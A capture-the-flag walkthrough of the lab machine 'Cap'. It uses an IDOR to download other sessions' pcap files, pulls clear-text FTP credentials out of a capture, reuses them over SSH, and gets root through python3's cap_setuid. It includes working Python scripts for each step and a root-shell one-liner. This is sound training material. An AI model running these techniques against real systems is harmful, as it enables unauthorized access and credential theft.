HTB: CAP

Praddyum Verma
3 min readOct 4, 2021
CAP Badge

Machine IP: 10.10.10.233
System IP: 10.10.16.12

Network Mapper

nmap -T4 -A -p- -v -oN nmap.txt 10.129.152.19

which gave the following output (the filtered high ports are just noise from the scan; the three interesting services are FTP, SSH and HTTP):

Nmap scan report for 10.129.152.19
Host is up (0.17s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
|
8670/tcp filtered unknown
16329/tcp filtered unknown
21140/tcp filtered unknown
22392/tcp filtered unknown
23351/tcp filtered unknown
36340/tcp filtered unknown
59688/tcp filtered unknown

FTP

On FTP we first tried an anonymous login, but it was rejected:

ftp 10.129.152.19
Connected to 10.129.152.19.
220 (vsFTPd 3.0.3)
Name (10.129.152.19:kevin): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> exit
221 Goodbye.

Webserver

So we moved on to the website on port 80.

Home page on port 80

On some enumeration we find the section Security Snapshot (5 Second PCAP + Analysis) at http://10.129.152.19/capture, which lands on a numbered page of the form http://10.129.152.19/data/xx

On analysis we found that it serves a pcap file with the captured network traffic, but one abnormal thing was that it was named 3.pcap (for you it could be 2.pcap). The number is nothing more than a counter in the URL, and the application never checks that the requested capture belongs to our session, which is a classic insecure direct object reference (IDOR). So I thought: can we retrieve 1.pcap as well? And yes, by changing the number in the request with Burp Suite we can.

Tampering with the capture number using Burp Suite
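The same walk over the capture ids, scripted instead of done by hand in Burp Suite. This is an added example and not part of the original writeup: it starts at the id the application gave us and counts down, keeping every id that returns 200 and stopping after a few consecutive misses. The base URL and the /data/<id> path are taken from the page; the stand-in "application" used to run it offline is constructed for the example, and `http_fetch` is what you would pass when running it against the real box.

```python
import urllib.error
import urllib.request


def http_fetch(url):
    """Fetch a URL and return (status, body); HTTP errors become a status, not an exception."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""


def walk_capture_ids(base_url, start_id, fetch=http_fetch, max_misses=3):
    """Walk /data/<id> downward from the id the application handed us.

    The capture number is only a counter in the URL, so every earlier id is
    a candidate.  We stop after `max_misses` consecutive non-200 responses
    (deleted or never-created ids) and return {id: body} for the ones found.
    """
    found = {}
    misses = 0
    for capture_id in range(start_id, -1, -1):
        status, body = fetch(f"{base_url}/data/{capture_id}")
        if status == 200:
            found[capture_id] = body
            misses = 0
        else:
            misses += 1
            if misses >= max_misses:
                break
    return found


# Constructed stand-in for the web application so the walk runs offline:
# ids 0..3 exist, everything else answers 404.
_FAKE_APP = {
    f"http://10.129.152.19/data/{i}": (200, f"<html>analysis of {i}.pcap</html>".encode())
    for i in range(4)
}


def fake_fetch(url):
    return _FAKE_APP.get(url, (404, b""))


if __name__ == "__main__":
    # Against the real box: walk_capture_ids("http://10.129.152.19", <id shown at /capture>)
    hits = walk_capture_ids("http://10.129.152.19", 3, fetch=fake_fetch)
    for capture_id in sorted(hits):
        print(capture_id, hits[capture_id].decode())
```

Starting a little above the id you were given is harmless: the miss counter only trips after several non-200 responses in a row, so a few ids that were never created do not end the walk early.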

Checking that file in Wireshark showed some readable traffic, but nothing like passwords, so I went back to check whether 0.pcap existed as well, and it did.

On analysis of 0.pcap with Wireshark we find the FTP username and password. FTP sends the USER and PASS commands in clear text, so anyone who can read a capture of the login session can read the credentials.

Captured credentials in 0.pcap
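What Wireshark's Follow TCP Stream shows for that login can also be pulled out programmatically. Below is an added example, not code from the original writeup: a minimal libpcap reader that walks Ethernet/IPv4/TCP frames, keeps only client-to-server traffic on port 21 and pairs each USER with the PASS that follows it on the same connection. The capture it parses is constructed inline for the example (RFC 5737 addresses, made-up username and password); point `extract_ftp_logins` at the bytes of a downloaded 0.pcap to use it for real.

```python
import re
import struct

# libpcap magic values: microsecond and nanosecond variants, either byte order.
_PCAP_MAGIC = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">", 0xA1B23C4D: "<", 0x4D3CB2A1: ">"}
DLT_EN10MB = 1  # Ethernet link type


def iter_frames(pcap):
    """Yield raw Ethernet frames from a libpcap-format byte string."""
    endian = _PCAP_MAGIC.get(struct.unpack("<I", pcap[:4])[0])
    if endian is None:
        raise ValueError("not a libpcap capture (bad magic)")
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    if linktype != DLT_EN10MB:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def tcp_segment(frame):
    """Return (src_ip, dst_ip, src_port, dst_port, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None  # not IPv4
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[16:18])[0]
    if frame[23] != 6:
        return None  # not TCP
    ip = frame[14:14 + total_len]  # drop any Ethernet padding
    src_ip = ".".join(str(b) for b in ip[12:16])
    dst_ip = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    if len(tcp) < 20:
        return None
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src_ip, dst_ip, src_port, dst_port, tcp[data_off:]


def extract_ftp_logins(pcap):
    """Pair USER/PASS commands per client connection to port 21."""
    pending = {}  # (client_ip, server_ip, client_port) -> username seen so far
    logins = []
    for frame in iter_frames(pcap):
        seg = tcp_segment(frame)
        if seg is None:
            continue
        src_ip, dst_ip, src_port, dst_port, payload = seg
        if dst_port != 21 or not payload:
            continue  # only client -> server control-channel data
        flow = (src_ip, dst_ip, src_port)
        for line in payload.decode("ascii", "replace").splitlines():
            m = re.match(r"(USER|PASS)\s+(.*)", line)
            if not m:
                continue
            if m.group(1) == "USER":
                pending[flow] = m.group(2)
            else:
                logins.append({"client": src_ip, "server": dst_ip,
                               "user": pending.pop(flow, None), "password": m.group(2)})
    return logins


def _frame(src_ip, dst_ip, sport, dport, payload):
    """Build one Ethernet/IPv4/TCP frame (checksums left zero; the parser ignores them)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(int(x) for x in src_ip.split(".")),
                     bytes(int(x) for x in dst_ip.split(".")))
    return eth + ip + tcp


def build_sample_pcap():
    """Constructed capture of an FTP login (not real traffic from the box)."""
    server, client = "192.0.2.10", "192.0.2.20"
    frames = [
        _frame(server, client, 21, 54412, b"220 (vsFTPd 3.0.3)\r\n"),
        _frame(client, server, 54412, 21, b"USER demo\r\n"),
        _frame(server, client, 21, 54412, b"331 Please specify the password.\r\n"),
        _frame(client, server, 54412, 21, b"PASS s3cret\r\n"),
        _frame(server, client, 21, 54412, b"230 Login successful.\r\n"),
    ]
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_EN10MB)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", 1600000000 + i, 0, len(f), len(f)))
        out.append(f)
    return b"".join(out)


if __name__ == "__main__":
    print(extract_ftp_logins(build_sample_pcap()))
```

The parser deliberately keys on the client's source port, so two logins from the same host on different connections are not mixed up, and a PASS with no preceding USER on that connection is still reported (with `user` set to `None`) rather than silently dropped.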

So let's log in to FTP with those credentials, and we have user.txt.

Login to FTP

Note: to download a file over FTP use `get <filename>`.

Now let's see if we can log in via SSH as the user found above, reusing the FTP password:

ssh <user>@10.129.152.19

Running linpeas shows that the python3 binary carries the cap_setuid capability, i.e. a process started from it is allowed to change its own UID. Since we can execute python3 as an ordinary user, we can have it call setuid(0) and then spawn a shell that runs as root.

Output of Linpeas
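What linpeas is doing under the hood is reading the file capabilities of every binary on the box, which you can list yourself with `getcap -r / 2>/dev/null`. The code below is an added example (not from the original writeup or from linpeas) that parses that output in both the older `/path = cap_x+ep` and newer `/path cap_x=ep` formats, flags only capabilities that are in the *effective* set (a capability that is merely inheritable does you no good), and prints the matching exploit one-liner when the binary is a python interpreter. The sample getcap lines and the list of dangerous capabilities are constructed for the example.

```python
import os
import re

# Capabilities that let whoever can execute the file become root more or less
# directly (constructed list for this example; extend as needed).
DANGEROUS = {
    "cap_setuid": "call setuid(0) and exec a shell",
    "cap_setgid": "call setgid(0); usually paired with cap_setuid",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow or root's SSH key",
    "cap_dac_override": "write any file, e.g. /etc/passwd",
    "cap_sys_admin": "mount, pivot_root and much more",
    "cap_sys_ptrace": "inject into root-owned processes",
    "cap_sys_module": "load a kernel module",
}

# One clause of a capability spec: "cap_a,cap_b+eip" or "cap_a=ep".
_CLAUSE = re.compile(r"((?:cap_\w+)(?:,cap_\w+)*)[+=]([eip]*)")


def parse_getcap_line(line):
    """Return (path, {cap: flags}) for one line of `getcap -r /` output, or None for blank lines."""
    line = line.strip()
    if not line:
        return None
    path, _, spec = line.partition(" ")
    spec = spec.lstrip("= ").strip()  # old libcap prints "= " before the spec
    caps = {}
    for names, flags in _CLAUSE.findall(spec):
        for name in names.split(","):
            caps[name] = flags
    return path, caps


def triage(getcap_output):
    """Flag binaries whose effective capability set contains a dangerous capability."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        hits = sorted(c for c, flags in caps.items() if c in DANGEROUS and "e" in flags)
        if hits:
            findings.append((path, hits))
    return findings


def setuid_oneliner(path):
    """Exploit command for a python interpreter that carries cap_setuid; None for other binaries."""
    if os.path.basename(path).startswith("python"):
        return f"{path} -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"
    return None


# Constructed sample of getcap output mixing both formats; only python3 is exploitable here.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3 = cap_setuid+ep
/usr/sbin/arping cap_chown=i
/usr/bin/mtr-packet cap_net_raw=ep
"""

if __name__ == "__main__":
    for path, caps in triage(SAMPLE_GETCAP):
        print(path, caps, [DANGEROUS[c] for c in caps])
        if "cap_setuid" in caps and setuid_oneliner(path):
            print("  try:", setuid_oneliner(path))
```

Note that `cap_chown=i` on arping is reported as harmless: the inheritable set only matters if the program also has the capability in its permitted set or is executed by a process that already holds it, which is not our situation as a low-privileged user.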

With a little bit of googling I landed on a content-rich blog post on Hacking Articles about Linux privilege escalation using capabilities.

So the steps will be:

which python3        # check the path of the python3 binary
cd /usr/bin/
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'   # set UID 0 and spawn a root bash

The capability is attached to the binary file itself, so running it through the usual PATH lookup works just as well as invoking it from /usr/bin; the cd is only there to make it obvious which binary we are running.
Root captured

And done. We'll meet soon with another awesome writeup; till then, stay tuned and keep hacking.
